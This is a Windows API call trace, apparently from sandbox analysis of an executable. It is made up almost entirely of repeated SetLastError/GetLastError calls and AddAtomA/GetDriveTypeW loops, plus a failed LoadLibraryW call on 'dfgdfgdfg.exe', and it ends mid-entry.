[0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.573] SetLastError (dwErrCode=0x0) [0095.573] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.574] SetLastError (dwErrCode=0x0) [0095.574] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.738] SetLastError (dwErrCode=0x0) [0095.738] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.739] SetLastError (dwErrCode=0x0) [0095.739] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.740] GetLastError () returned 0x0 [0095.740] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.741] SetLastError (dwErrCode=0x0) [0095.741] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.742] GetLastError () returned 0x0 [0095.742] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.743] SetLastError (dwErrCode=0x0) [0095.743] GetLastError () returned 0x0 [0095.744] SetLastError (dwErrCode=0x0) [0095.744] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0095.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0095.744] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.745] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.745] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.746] AddAtomA (lpString=0x0) returned 0x0 [0095.746] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.747] AddAtomA (lpString=0x0) returned 0x0 [0095.747] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.748] AddAtomA (lpString=0x0) returned 0x0 [0095.748] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.749] AddAtomA (lpString=0x0) returned 0x0 [0095.749] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.750] AddAtomA (lpString=0x0) returned 0x0 [0095.750] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.751] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.751] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.752] AddAtomA (lpString=0x0) returned 0x0 [0095.752] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.753] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.753] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.754] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.754] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.755] AddAtomA (lpString=0x0) returned 0x0 [0095.755] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.756] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.756] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.757] AddAtomA (lpString=0x0) returned 0x0 [0095.757] 